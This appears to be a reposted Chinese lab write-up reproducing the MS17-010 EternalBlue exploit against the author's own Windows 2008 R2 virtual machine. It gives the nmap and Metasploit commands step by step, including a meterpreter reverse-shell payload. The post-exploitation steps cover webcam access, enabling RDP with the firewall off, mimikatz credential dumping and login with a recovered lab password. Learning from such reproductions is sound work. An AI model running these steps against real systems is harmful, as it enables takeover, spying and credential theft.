PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

為{幸葍}努か 提交于 2019-12-05 11:07:45

猫宁!!!

 

参考:

https://www.anquanke.com/post/id/86245

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/backlion/p/9484949.html

https://www.jianshu.com/p/91588e284fe8

 

“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。

 

微软的漏洞2个漏洞公告

https://support.microsoft.com/zh-cn/help/4012598/title

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN

 

windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。

https://msdn.itellyou.cn/

 

记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。

 

虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式

 

ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/

nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。

msfconsole,启动MSF

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描

set RHOST 192.168.100.27

run

证实存在漏洞

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.100.27

run

竟然把服务器给打重启了,没有连接上去

show payloads,看一下更多种类的payload,46个

show targets,显示适用的目标

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。

set RHOST 192.168.100.27

run

成功进入服务器系统

screenshot,截屏

webcam_scream,可以开启摄像头

run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙

shell,直接进入系统

load mimikatz,加载密码读取工具

wdigest,成功获取我的密码

rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!

远程连接服务器就好了

 

arp查看内网情形

获得当前木马进程,getid

ps查看

获取用户的身份和权限

判断服务器是不是被人在使用

run和bgrun,有大量的帮助文件

sysinfo,显示计算机信息

             

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!